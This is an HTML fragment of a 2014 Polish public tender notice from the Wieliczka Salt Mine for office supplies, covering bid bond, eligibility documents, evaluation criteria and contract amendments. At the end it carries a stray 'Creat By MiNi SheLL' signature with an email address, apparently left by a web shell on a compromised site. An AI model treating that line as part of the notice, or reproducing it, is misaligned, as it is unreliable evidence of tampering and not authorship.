<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium w wysokości: 4 000,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIII pkt 2 specyfikacji.
2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2014/EL/20.
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3. Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIII pkt 2 specyfikacji.
4. Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, 
nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ww. ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
6. Zgodnie z art. 46 ust 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7. Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa
w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania
o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej dostawy materiałów biurowych o wartości nie mniejszej niż 50 000 złotych (brutto), wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego dostawa została wykonana, oraz załączeniem dowodów, czy została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość materiałów biurowych - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie o którym mowa w pkt 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1) przestojów i opóźnień w wykonywaniu przedmiotu umowy wynikłych z przyczyn leżących po stronie Zamawiającego,
2) działania siły wyższej,
3) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3. W przypadku niedokonania przez Zamawiającego zakupu materiałów biurowych o wartości 60% maksymalnego wynagrodzenia brutto określonego w § 7 ust. 1 umowy, dopuszcza się możliwość jednokrotnego przedłużenia okresu dostarczania materiałów biurowych, o którym mowa w § 5 ust. 1 umowy, o okres do 6 miesięcy.
4. Zaistnienie, którejkolwiek z przyczyn, wymienionych w pkt 2 lub 3 nie powoduje powstania u żadnej ze stron umowy, roszczenia o zmianę umowy. 
5. W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 2 lub 3, każdej ze stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1) szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2) uzasadnienie dokonania zmiany umowy,
3) projekt zmiany umowy.
6. Wystąpienie, o którym mowa w pkt 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7. Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
8. Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
9. Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com